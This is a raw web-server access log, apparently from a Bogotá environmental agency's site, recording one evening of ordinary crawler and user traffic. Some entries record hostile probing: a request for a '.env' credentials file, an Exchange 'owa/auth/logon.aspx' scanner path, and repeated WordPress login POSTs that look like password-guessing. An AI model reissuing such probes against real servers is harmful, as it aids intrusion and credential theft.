188.166.38.112 - - [01/Oct/2022:19:58:06 -0500] "\x80\xb6T\x1a\x13i\xaf\xc8\x1e\xc5S\xd0\x07\xca\x9es\x0cc^\xb0,G\x1c\xb0\x96\xcb\xdd\x1b G\x1c\xb0-C^\xb0,G\x1f\xb8,G\x1c\xb0,G\x1c\xb0\x86G\x1c\xb0,G7\x9b,G\x1c\xb0\x04G\x1c\xb0,G\x1c\xb0,G\x1c\xb0,G\x1c\xb0-F\x1c\xb0,G" 400 226
188.166.38.112 - - [01/Oct/2022:19:58:06 -0500] "\x16\x03\x01" 400 226
188.166.38.112 - - [01/Oct/2022:19:58:07 -0500] "\x16\x03\x01" 400 226
188.166.38.112 - - [01/Oct/2022:19:58:07 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [01/Oct/2022:19:58:30 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Jurisprudencia%20Sent%202000-00005-01.doc HTTP/1.1" 304 -
157.55.39.159 - - [01/Oct/2022:19:58:57 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
172.22.2.4 - - [01/Oct/2022:19:59:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
108.174.2.215 - - [01/Oct/2022:20:00:44 -0500] "GET /acuerdos-de-conservacion-firmados-en-la-reserva-van-der-hammen-empieza-a-dar-frutos.html HTTP/1.1" 206 843
172.22.2.4 - - [01/Oct/2022:19:59:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.145.240.68 - - [01/Oct/2022:20:01:55 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+pS14ttBkAIUzwrS3dU6FOKbV34dAa0AZhXPcyTK0DvSe7P2WB2uaH&y=U2FsdGVkX1+EX5p3RqoZkEk+LJL2+x6rpMLnrN45D+AIhXZVTwaoBKyEfFfuMF2p HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:20:01:56 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/zXTopQ1wpUcuqOacQ8Z6gaHXM+PerfFLe4ccuHgDcz0QmQYFU41v/&y=U2FsdGVkX1+zr21WOl5+vggrVeBNsefmWbQ19YEtToluzO7rl2m5AW5j1YCTG9IG HTTP/1.1" 503 1124
172.22.2.4 - - [01/Oct/2022:20:00:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
201.245.192.253 - - [01/Oct/2022:20:02:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:03:00 -0500] "HEAD / HTTP/1.1" 200 -
191.156.233.230 - - [01/Oct/2022:20:04:08 -0500] "GET /transportadores-de-carga-conocieron-las-opciones-para-contaminar-menos-y-enrutarse-en-la-sostenibilidad.html?fbclid=IwAR1RPIcAnue8N_Y3WwsnVRnp2m9HDraNrdnKD9DK27exLl-n4i6JOx200m8 HTTP/1.1" 200 1003
185.119.81.96 - - [01/Oct/2022:20:04:23 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [01/Oct/2022:20:04:24 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
207.46.13.84 - - [01/Oct/2022:20:06:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%20351-400/00000381.tif HTTP/1.1" 200 167488
172.22.2.4 - - [01/Oct/2022:20:06:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [01/Oct/2022:20:05:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:20:07:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:08:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:20:06:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
5.255.253.106 - - [01/Oct/2022:20:10:51 -0500] "-" 408 -
5.255.253.174 - - [01/Oct/2022:20:10:56 -0500] "-" 408 -
5.45.207.133 - - [01/Oct/2022:20:11:02 -0500] "-" 408 -
87.250.224.175 - - [01/Oct/2022:20:11:07 -0500] "-" 408 -
87.250.224.4 - - [01/Oct/2022:20:11:22 -0500] "-" 408 -
213.180.203.85 - - [01/Oct/2022:20:11:37 -0500] "-" 408 -
190.27.151.122 - - [01/Oct/2022:20:11:51 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 503 1124
190.27.151.122 - - [01/Oct/2022:20:11:53 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.27.151.122 - - [01/Oct/2022:20:11:55 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 503 1124
190.27.151.122 - - [01/Oct/2022:20:11:57 -0500] "GET /sipsesda/ HTTP/1.1" 200 1477
190.27.151.122 - - [01/Oct/2022:20:11:57 -0500] "GET /css/segobdis.css HTTP/1.1" 404 1264
190.27.151.122 - - [01/Oct/2022:20:11:58 -0500] "GET /sipsesda/faces/login.jspx HTTP/1.1" 200 7575
190.27.151.122 - - [01/Oct/2022:20:11:58 -0500] "GET /sipsesda/js/disable_browser_buttons.js;jsessionid=ac16012b22b8e121dd25e7894f6988acd147985a7b2e.e34Lc3uRbN4Oc40ObO0 HTTP/1.1" 200 2767
190.27.151.122 - - [01/Oct/2022:20:11:58 -0500] "GET /sipsesda/adf/styles/cache/segobdis16-desktop-10_1_3_4_0-webkit.css;jsessionid=ac16012b22b8e121dd25e7894f6988acd147985a7b2e.e34Lc3uRbN4Oc40ObO0 HTTP/1.1" 200 57326
190.27.151.122 - - [01/Oct/2022:20:11:58 -0500] "GET /sipsesda/js/funciones.js;jsessionid=ac16012b22b8e121dd25e7894f6988acd147985a7b2e.e34Lc3uRbN4Oc40ObO0 HTTP/1.1" 200 36377
190.27.151.122 - - [01/Oct/2022:20:11:58 -0500] "GET /sipsesda/adf/images/t.gif;jsessionid=ac16012b22b8e121dd25e7894f6988acd147985a7b2e.e34Lc3uRbN4Oc40ObO0 HTTP/1.1" 200 86
190.27.151.122 - - [01/Oct/2022:20:11:58 -0500] "GET /sipsesda/imagenes/encabezado.jpg;jsessionid=ac16012b22b8e121dd25e7894f6988acd147985a7b2e.e34Lc3uRbN4Oc40ObO0 HTTP/1.1" 200 18018
190.27.151.122 - - [01/Oct/2022:20:11:58 -0500] "GET /sipsesda/adf/jsLibs/Common10_1_3_4_0.js;jsessionid=ac16012b22b8e121dd25e7894f6988acd147985a7b2e.e34Lc3uRbN4Oc40ObO0 HTTP/1.1" 200 132959
190.27.151.122 - - [01/Oct/2022:20:12:00 -0500] "POST /sipsesda/faces/login.jspx;jsessionid=ac16012b22b8e121dd25e7894f6988acd147985a7b2e.e34Lc3uRbN4Oc40ObO0 HTTP/1.1" 200 5561
190.27.151.122 - - [01/Oct/2022:20:12:00 -0500] "GET /sipsesda/js/disable_browser_buttons.js HTTP/1.1" 200 2767
190.27.151.122 - - [01/Oct/2022:20:12:00 -0500] "GET /sipsesda/adf/styles/cache/segobdis16-desktop-10_1_3_4_0-webkit.css HTTP/1.1" 200 57326
190.27.151.122 - - [01/Oct/2022:20:12:00 -0500] "GET /sipsesda/js/funciones.js HTTP/1.1" 200 36377
190.27.151.122 - - [01/Oct/2022:20:12:00 -0500] "GET /sipsesda/adf/images/t.gif HTTP/1.1" 200 86
190.27.151.122 - - [01/Oct/2022:20:12:00 -0500] "GET /sipsesda/imagenes/encabezado.jpg HTTP/1.1" 200 18018
190.27.151.122 - - [01/Oct/2022:20:12:00 -0500] "GET /sipsesda/adf/jsLibs/Common10_1_3_4_0.js HTTP/1.1" 200 132959
190.27.151.122 - - [01/Oct/2022:20:12:02 -0500] "POST /sipsesda/faces/vista/sistema/seleccionRol.jspx HTTP/1.1" 200 27993
190.27.151.122 - - [01/Oct/2022:20:12:03 -0500] "GET /sipsesda/js/menu.js HTTP/1.1" 200 5358
190.27.151.122 - - [01/Oct/2022:20:12:03 -0500] "GET /sipsesda/js/jquery-latest.js HTTP/1.1" 200 92556
190.27.151.122 - - [01/Oct/2022:20:12:03 -0500] "GET /sipsesda/js/menu13_compact.js HTTP/1.1" 200 22980
190.27.151.122 - - [01/Oct/2022:20:12:03 -0500] "GET /sipsesda/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
190.27.151.122 - - [01/Oct/2022:20:12:03 -0500] "GET /sipsesda/faces/imagenes/vinetaAbajo.gif HTTP/1.1" 200 72
190.27.151.122 - - [01/Oct/2022:20:12:03 -0500] "GET /sipsesda/faces/imagenes/vinetaDerecha.gif HTTP/1.1" 200 107
87.250.224.37 - - [01/Oct/2022:20:12:07 -0500] "-" 408 -
190.27.151.122 - - [01/Oct/2022:20:12:07 -0500] "GET /sipsesda/faces/vista/sistema/cargarMenu.jspx?accionMenu=listadoConsultaSolicitudProceso&menuID=121 HTTP/1.1" 200 28200
190.27.151.122 - - [01/Oct/2022:20:12:07 -0500] "GET /sipsesda/imagenes/cargando.gif HTTP/1.1" 200 1287
190.27.151.122 - - [01/Oct/2022:20:12:07 -0500] "POST /sipsesda/faces/vista/sistema/cargarMenu.jspx HTTP/1.1" 200 36046
190.27.151.122 - - [01/Oct/2022:20:12:08 -0500] "GET /sipsesda/adf/jsLibs/resources/LocaleElements_es_CO10_1_3_4_0.js HTTP/1.1" 200 824
190.27.151.122 - - [01/Oct/2022:20:12:08 -0500] "GET /sipsesda/adf/images/dfb.gif HTTP/1.1" 200 194
190.27.151.122 - - [01/Oct/2022:20:12:12 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/listadoConsultaSolicitudProceso.jspx HTTP/1.1" 200 37354
190.27.151.122 - - [01/Oct/2022:20:12:53 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/listadoConsultaSolicitudProceso.jspx HTTP/1.1" 200 47839
201.245.192.253 - - [01/Oct/2022:20:12:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [01/Oct/2022:20:11:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.27.151.122 - - [01/Oct/2022:20:13:02 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/soloconsultaSolicitudProceso.jspx?_afPfm=1 HTTP/1.1" 200 33533
216.245.221.92 - - [01/Oct/2022:20:13:03 -0500] "HEAD / HTTP/1.1" 200 -
5.255.253.166 - - [01/Oct/2022:20:13:07 -0500] "-" 408 -
64.124.8.25 - - [01/Oct/2022:20:13:49 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:12:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
213.180.203.3 - - [01/Oct/2022:20:14:07 -0500] "-" 408 -
157.55.39.202 - - [01/Oct/2022:20:14:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 269023
64.124.8.25 - - [01/Oct/2022:20:15:19 -0500] "-" 408 -
185.119.81.109 - - [01/Oct/2022:20:16:00 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [01/Oct/2022:20:16:01 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
64.124.8.25 - - [01/Oct/2022:20:16:02 -0500] "-" 408 -
87.250.224.144 - - [01/Oct/2022:20:16:07 -0500] "-" 408 -
199.59.150.181 - - [01/Oct/2022:20:17:53 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [01/Oct/2022:20:17:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:18:00 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.25 - - [01/Oct/2022:20:18:44 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:17:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.218.206.68 - - [01/Oct/2022:20:19:02 -0500] "GET / HTTP/1.1" 200 319
87.250.224.117 - - [01/Oct/2022:20:19:07 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:18:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
207.46.13.84 - - [01/Oct/2022:20:20:58 -0500] "GET /BLA/resoluciones/00000344.tif HTTP/1.1" 404 1018
199.16.157.183 - - [01/Oct/2022:20:21:12 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [01/Oct/2022:20:21:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [01/Oct/2022:20:21:48 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
216.218.206.88 - - [01/Oct/2022:20:22:11 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [01/Oct/2022:20:22:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:23:00 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.25 - - [01/Oct/2022:20:23:24 -0500] "-" 408 -
173.252.83.11 - - [01/Oct/2022:20:23:27 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
172.22.2.4 - - [01/Oct/2022:20:23:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.182 - - [01/Oct/2022:20:25:13 -0500] "GET /alcaldia-de-bogota-y-gobernacion-de-cundinamarca-suscriben-convenio-para-implementar-pagos-por-servicios-ambientales-en-la-bogota-region.html HTTP/1.1" 200 1133
172.22.2.4 - - [01/Oct/2022:20:23:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
172.22.2.4 - - [01/Oct/2022:20:25:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
207.46.13.40 - - [01/Oct/2022:20:27:10 -0500] "GET /sia/ HTTP/1.1" 200 2661
201.245.192.253 - - [01/Oct/2022:20:27:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:28:00 -0500] "HEAD / HTTP/1.1" 200 -
43.131.66.209 - - [01/Oct/2022:20:28:42 -0500] "GET / HTTP/1.1" 200 319
207.46.13.84 - - [01/Oct/2022:20:28:49 -0500] "GET /bla/resoluciones/autos%202021/6197.pdf HTTP/1.1" 200 1806408
64.124.8.25 - - [01/Oct/2022:20:30:26 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:28:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:20:29:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
64.124.8.25 - - [01/Oct/2022:20:31:21 -0500] "-" 408 -
201.245.192.253 - - [01/Oct/2022:20:31:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [01/Oct/2022:20:31:48 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
207.46.13.40 - - [01/Oct/2022:20:32:53 -0500] "GET /BLA/resoluciones/AUTOS%202022/2950.pdf HTTP/1.1" 200 412072
201.245.192.253 - - [01/Oct/2022:20:32:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:33:00 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.25 - - [01/Oct/2022:20:33:07 -0500] "-" 408 -
66.249.73.97 - - [01/Oct/2022:20:33:48 -0500] "-" 408 -
186.31.119.73 - - [01/Oct/2022:20:34:11 -0500] "-" 408 -
207.46.13.89 - - [01/Oct/2022:20:34:13 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2015%2F HTTP/1.1" 200 130562
64.124.8.25 - - [01/Oct/2022:20:34:57 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:35:25 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1038
34.90.66.155 - - [01/Oct/2022:20:35:44 -0500] "GET / HTTP/1.1" 200 319
34.90.66.155 - - [01/Oct/2022:20:35:44 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.25 - - [01/Oct/2022:20:35:57 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:35:26 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [01/Oct/2022:20:34:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:20:36:30 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [01/Oct/2022:20:34:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49689
172.22.2.4 - - [01/Oct/2022:20:35:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47823
64.124.8.25 - - [01/Oct/2022:20:37:20 -0500] "-" 408 -
201.245.192.253 - - [01/Oct/2022:20:37:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:38:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:20:36:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
64.124.8.25 - - [01/Oct/2022:20:38:24 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:38:43 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [01/Oct/2022:20:38:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
185.119.81.109 - - [01/Oct/2022:20:40:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [01/Oct/2022:20:40:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
157.55.39.202 - - [01/Oct/2022:20:40:39 -0500] "GET /BLA/resoluciones/00000348.tif HTTP/1.1" 404 1018
185.119.81.109 - - [01/Oct/2022:20:41:22 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [01/Oct/2022:20:41:23 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [01/Oct/2022:20:41:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [01/Oct/2022:20:41:48 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
172.22.2.4 - - [01/Oct/2022:20:40:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:20:42:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [01/Oct/2022:20:41:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [01/Oct/2022:20:43:09 -0500] "HEAD / HTTP/1.1" 200 -
31.148.131.221 - - [01/Oct/2022:20:44:47 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/1.%20EJECUCION%20DE%20VIGENCIAS%20ENERO%202022.pdf HTTP/1.1" 200 1203474
201.245.192.253 - - [01/Oct/2022:20:45:20 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12180
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:21 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [01/Oct/2022:20:45:22 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 24714
201.245.192.253 - - [01/Oct/2022:20:45:22 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
201.245.192.253 - - [01/Oct/2022:20:45:22 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 26770
64.124.8.25 - - [01/Oct/2022:20:45:24 -0500] "-" 408 -
201.245.192.253 - - [01/Oct/2022:20:45:34 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11822
201.245.192.253 - - [01/Oct/2022:20:45:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [01/Oct/2022:20:45:34 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [01/Oct/2022:20:46:55 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
201.245.192.253 - - [01/Oct/2022:20:47:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:48:00 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:20:46:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12180
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.151.122 - - [01/Oct/2022:20:48:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [01/Oct/2022:20:47:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
64.124.8.25 - - [01/Oct/2022:20:51:40 -0500] "-" 408 -
87.250.224.43 - - [01/Oct/2022:20:52:09 -0500] "-" 408 -
64.124.8.33 - - [01/Oct/2022:20:52:25 -0500] "-" 408 -
201.245.192.253 - - [01/Oct/2022:20:52:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
199.59.150.180 - - [01/Oct/2022:20:52:54 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [01/Oct/2022:20:53:00 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.25 - - [01/Oct/2022:20:53:36 -0500] "-" 408 -
157.55.39.202 - - [01/Oct/2022:20:53:50 -0500] "GET /BLA/resoluciones/00000307.tif HTTP/1.1" 404 1018
172.22.2.4 - - [01/Oct/2022:20:52:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:20:54:01 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 911
172.22.2.4 - - [01/Oct/2022:20:54:27 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
64.124.8.25 - - [01/Oct/2022:20:54:27 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:53:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
157.55.39.25 - - [01/Oct/2022:20:55:05 -0500] "GET /BLA/resoluciones/AUTOS%202014/0752.pdf HTTP/1.1" 200 152524
173.252.107.19 - - [01/Oct/2022:20:55:26 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
64.124.8.25 - - [01/Oct/2022:20:55:43 -0500] "-" 408 -
173.252.127.118 - - [01/Oct/2022:20:57:00 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
207.46.13.89 - - [01/Oct/2022:20:57:24 -0500] "GET /BLA/resoluciones/AUTOS%202022/3422.pdf HTTP/1.1" 200 411877
201.245.192.253 - - [01/Oct/2022:20:57:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [01/Oct/2022:20:58:00 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.211 - - [01/Oct/2022:20:58:12 -0500] "GET /combo?browserid=other&minifiertype=&languageid=es_es&b=6202&t=1420318876000&/html/js/aui/color-base/color-base-min.js HTTP/1.1" 404 1034
199.16.157.181 - - [01/Oct/2022:20:58:52 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
157.55.39.202 - - [01/Oct/2022:20:59:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0825.pdf HTTP/1.1" 304 -
172.22.2.4 - - [01/Oct/2022:20:58:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.231.131 - - [01/Oct/2022:21:00:09 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:20:58:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
207.46.13.40 - - [01/Oct/2022:21:02:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0526.pdf HTTP/1.1" 200 341991
190.145.240.68 - - [01/Oct/2022:21:02:32 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19QQGhaC+bEtPmBXIzLeMMDQ5H7kJypTBy6mYZ4lSd6lMvrhhsm+os6&y=U2FsdGVkX1+ZG9WPtsXk/hTCAHd/2jlT5MI9qVdfGAof/O476Uo3Z6lhcSZ+bL7q HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:21:02:32 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/PaX47oGgrBDLMUX7KWZSKU0MJr2nPQfdU9sSAjXSm7TOiil6q0rub&y=U2FsdGVkX1/Nokr+J72m4IrCcQX9yrdSCJGxcc/7QZI7uPJdoJi6FDcOn4CvFQvC HTTP/1.1" 503 1124
